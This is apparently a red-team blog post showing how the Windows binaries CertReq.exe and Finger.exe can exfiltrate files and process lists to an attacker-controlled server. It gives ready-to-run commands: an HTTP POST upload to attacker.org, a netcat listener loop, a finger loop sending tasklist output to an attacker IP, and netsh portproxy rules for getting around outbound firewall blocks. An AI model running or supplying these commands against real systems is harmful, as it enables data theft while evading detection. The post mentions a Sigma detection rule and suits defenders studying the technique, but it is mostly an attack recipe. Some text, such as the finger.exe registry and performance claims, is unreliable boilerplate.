abusing Living off the Land binaries (Lolbins) for data exfiltration
Introduction
Living off the Land binaries (Lolbins) are legitimate binaries that advanced adversaries often misuse to perform actions beyond their original purpose. sophisticated threat and detecting them requires advanced tools, Cybercriminals actively use them to download malwares, to ensure persistence, for data exfiltration, for lateral movement, and more
during my red team engagements, i always tend to use uncommon tools, methods, and TTP’s to fly under the radar as much as possible.
in this blog i will demonstrate 2 tools that are windows build-in to exfiltrate small files to an attacker controlled server.
1.CertReq.exe
CertReq.exe is present on Windows and its intended use is to assist with the creation and installation of certificates. It is one of the Lolbins which is overly exploited by adversaries, it can be used to perform malicious actions without attracting the attention of security solutions. adversaries can use CertReq.exe to upload and download small files. It can be used to upload a file via HTTP POST, download a file via HTTP POST and save it to disk or show contents.
Uploading a file to an attacker controlled server via HTTP POST
CertReq -Post -config https://attacker.org/ file.txt
capturing the file using Netcat.
the file contain the HTTP request that was made along with the exfiltrated content.
Den Iuzvik developed a threat hunting Sigma rule that detects possible file upload and download with CertReq.exe:
https://tdm.socprime.com/tdm/info/BBbpPolVZpLp/SJcgLnMBQAH5UgbBoihF/?p=1
2. Finger.exe
This file is part of Microsoft Windows Operating System. Finger.exe is developed by Microsoft Corporation. It’s a system and hidden file. Finger.exe is usually located in the %SYSTEM% sub-folder and its usual size is 9,216 bytes. it creates new records and folders in the Windows registry. Check your system performance to eliminate possible application conflicts and system failures. however it can also be used to exfiltrate data.
to exfiltrate the running process for example using finger.exe
on the attacker side run the following :
touch file; while [ 1 ]; do nc -q 0 -nlvp 79 < file;done >> exfiltrated.txton the victim side:
for /f “tokens=1” %i in (‘tasklist’) do finger %i@attacker-ip the file exfiltrated.txt contains the result of all the running process on the target machine.
Firewall problems….
by default finger utilizes port 79 which is probably blocked by the organization firewall. You can get around with this if you have administration privileges using netsh portproxy and change the port to something allowed outbound 80,443 for example .
netsh interface portproxy add v4tov4 listenaddress=127.0.0.1 listenport=79 connectaddress=attacker_finger_server connectport=443
netsh interface portproxy add v4tov4 listenaddress=127.0.0.1
listenport=443 connectaddress=127.0.0.1 connectport=79now you can finger the localhost and all the traffic will be redirected to your server
for /f “tokens=1” %i in (‘tasklist’) do finger %i@127.0.0.1references:
